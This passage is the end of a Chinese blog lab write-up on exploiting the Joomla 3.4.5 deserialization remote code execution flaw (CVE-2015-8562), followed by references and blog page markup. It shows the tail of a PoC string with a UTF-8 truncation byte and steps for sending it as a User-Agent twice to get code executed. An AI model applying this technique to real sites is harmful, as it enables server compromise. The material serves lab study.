class="hljs-subst">&#123;$poc&#125;</span>\xF0\x9D\x8C\x86&quot;</span>;<br></code></pre></td></tr></table></figure>
<p>将生成好的POC作为User-Agent，带上第一步获取的Cookie发包，这一次发包，脏<strong>数据进入Mysql数据库</strong>。</p>
<p>然后同样的包<strong>再发一次</strong>，我们的代码被执行：</p>
<p><img src="https://i.loli.net/2021/02/13/Lhlf4DN5pH7erMv.png" srcset="/img/loading.gif"></p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html#session">Joomla远程代码执行漏洞分析（总结） | 离别歌 (leavesongs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/64017530">Joomla 3.4.5 反序列化漏洞（CVE-2015-8562) 分析 - 知乎 (zhihu.com)</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E9%9D%B6%E5%9C%BA/">靶场</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/02/12/upload-labs%E9%9D%B6%E5%9C%BA%E5%B0%8F%E8%AE%B0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">upload-labs靶场小记</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/02/05/%E5%AD%A6%E4%B9%A0%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%9A%84%E4%B8%80%E4%BA%9B%E7%AC%94%E8%AE%B0/">
                        <span class="hidden-mobile">学习正则表达式的一些笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    Fluid.utils.waitElementVisible('vcomments', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz",
          app_key: "y4AXlgIqQsV7Enr3IFS3r6Ck",
          placeholder: "欢迎评论噢~",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>


  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  

<span id="sitetime"></span>
<script language=javascript>
	function siteTime(){
		window.setTimeout("siteTime()", 1000);
		var seconds = 1000;
		var minutes = seconds * 60;
		var hours = minutes * 60;
		var days = hours * 24;
		var years = days * 365;
		var today = new Date();
		var todayYear = today.getFullYear();
		var todayMonth = today.getMonth()+1;
		var todayDate = today.getDate();
		var todayHour = today.getHours();
		var todayMinute = today.getMinutes();
		var todaySecond = today.getSeconds();
		/* 
		Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
		year - 作为date对象的年份，为4位年份值
		month - 0-11之间的整数，做为date对象的月份
		day - 1-31之间的整数，做为date对象的天数
		hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
		minutes - 0-59之间的整数，做为date对象的分钟数
		seconds - 0-59之间的整数，做为date对象的秒数
		microseconds - 0-999之间的整数，做为date对象的毫秒数
        */
		var t1 = Date.UTC(2020,12,30,00,00,00); //北京时间2020-12-30 00:00:00
		var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
		var diff = t2-t1;
		var diffYears = Math.floor(diff/years);
		var diffDays = Math.floor((diff/days)-diffYears*365);
		var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
		var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
		var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
		document.getElementById("sitetime").innerHTML=" 自Na0h将神光棒放入此地已"+/*diffYears+" 年 "+*/diffDays+" 天"+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒🌩٩(๏̯๏)۶❤ ";
	}
	siteTime();
</script>


</footer>


<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-MLL1PZ9RBK', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  
    <!-- Google gtag.js -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=260676474"></script>
    <script defer>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', '260676474');
    </script>
  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>






<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>

</body>
</html>
